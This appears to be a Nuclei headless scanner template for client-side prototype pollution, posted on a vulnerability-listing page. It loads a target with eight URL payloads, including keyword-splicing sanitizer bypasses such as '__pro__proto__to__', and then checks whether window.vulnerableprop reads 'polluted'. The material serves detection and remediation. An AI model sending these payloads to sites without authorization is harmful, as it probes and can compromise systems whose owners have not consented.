prototype-pollution-check: Prototype Pollution Check

日期: 2025-08-01 | 影响软件: prototype | POC: 已公开

漏洞描述

PoC代码[已公开]

# Nuclei headless template: detects client-side prototype pollution by
# loading the target with several query/fragment payloads and then reading
# window.vulnerableprop from inside the page. If that property resolves to
# "polluted", the page's URL-parameter parser wrote into Object.prototype.
#
# Remediation for a page that matches: reject the keys __proto__,
# constructor and prototype (at every nesting level) when turning query or
# hash parameters into objects, or build those objects with
# Object.create(null) so the prototype chain is never reachable.
id: prototype-pollution-check

info:
  name: Prototype Pollution Check
  author: pdteam
  severity: medium
  metadata:
    # One navigate action per headless entry below (8 entries).
    max-request: 8
    verified: true
  # headless: the check runs in a real browser context; it cannot be
  # evaluated over plain HTTP responses.
  tags: headless,vuln

headless:
  # Entries 1-2: constructor.prototype path, bracket and dot notation.
  # Entries 3-4: __proto__ path, bracket and dot notation.
  # Entries 5-8: the same keywords with the token spliced into itself
  # (__pro__proto__to__, constconstructorructor, protoprototypetype) —
  # presumably to exercise sanitizers that strip the keyword a single time;
  # the template does not document this, so confirm before relying on it.
  # Every entry: navigate with the payload, wait for load, run a script
  # that returns window.vulnerableprop, and word-match its result.
  # A clean run is not proof the page is safe: each entry covers one
  # parameter-parsing idiom only.
  - steps:
      - args:
          url: "{{BaseURL}}?constructor[prototype][vulnerableprop]=polluted#constructor[prototype][vulnerableprop]=polluted"
        action: navigate

      - action: waitload

      # The script's return value is stored under `name` and referenced by
      # the matcher's `part` below.
      - action: script
        name: extract1
        args:
          code: |
            () => {
             return window.vulnerableprop
            }
    matchers:
      - type: word
        part: extract1
        words:
          - "polluted"

  - steps:
      - args:
          url: "{{BaseURL}}?constructor.prototype.vulnerableprop=polluted#constructor.prototype.vulnerableprop=polluted"
        action: navigate

      - action: waitload

      - action: script
        name: extract2
        args:
          code: |
            () => {
             return window.vulnerableprop
            }
    matchers:
      - type: word
        part: extract2
        words:
          - "polluted"

  - steps:
      - args:
          url: "{{BaseURL}}?__proto__[vulnerableprop]=polluted#__proto__.vulnerableprop=polluted&__proto__[vulnerableprop]=polluted"
        action: navigate

      - action: waitload

      - action: script
        name: extract3
        args:
          code: |
            () => {
             return window.vulnerableprop
            }
    matchers:
      - type: word
        part: extract3
        words:
          - "polluted"

  # Entry 4 is the only one that carries no fragment (#...) part.
  - steps:
      - args:
          url: "{{BaseURL}}?__proto__.vulnerableprop=polluted"
        action: navigate

      - action: waitload

      - action: script
        name: extract4
        args:
          code: |
            () => {
             return window.vulnerableprop
            }
    matchers:
      - type: word
        part: extract4
        words:
          - "polluted"

  - steps:
      - args:
          url: "{{BaseURL}}?__pro__proto__to__[vulnerableprop]=polluted"
        action: navigate

      - action: waitload

      - action: script
        name: extract5
        args:
          code: |
            () => {
             return window.vulnerableprop
            }
    matchers:
      - type: word
        part: extract5
        words:
          - "polluted"

  - steps:
      - args:
          url: "{{BaseURL}}?__pro__proto__to__.vulnerableprop=polluted"
        action: navigate

      - action: waitload

      - action: script
        name: extract6
        args:
          code: |
            () => {
             return window.vulnerableprop
            }
    matchers:
      - type: word
        part: extract6
        words:
          - "polluted"

  - steps:
      - args:
          url: "{{BaseURL}}?constconstructorructor[protoprototypetype][vulnerableprop]=polluted"
        action: navigate

      - action: waitload

      - action: script
        name: extract7
        args:
          code: |
            () => {
             return window.vulnerableprop
            }
    matchers:
      - type: word
        part: extract7
        words:
          - "polluted"

  - steps:
      - args:
          url: "{{BaseURL}}?constconstructorructor.protoprototypetype.vulnerableprop=polluted"
        action: navigate

      - action: waitload

      - action: script
        name: extract8
        args:
          code: |
            () => {
             return window.vulnerableprop
            }

    matchers:
      - type: word
        part: extract8
        words:
          - "polluted"
# NOTE(review): the trailing digest line looks like a template signature
# computed over the body above; any edit to the body, including these
# comments, presumably invalidates it — re-sign (or drop the line) before
# distributing the edited template.
# digest: 490a00463044022019a45f47ab82b37c73a40d6116a659fc7fee313d6385b758458cb99d62a6ba5f022037f136146fdc0b51edd200db9ce11a0936a5f3b48e2442562c5037a57cd0987b:922c64590222798bb761d5b6d8e72950
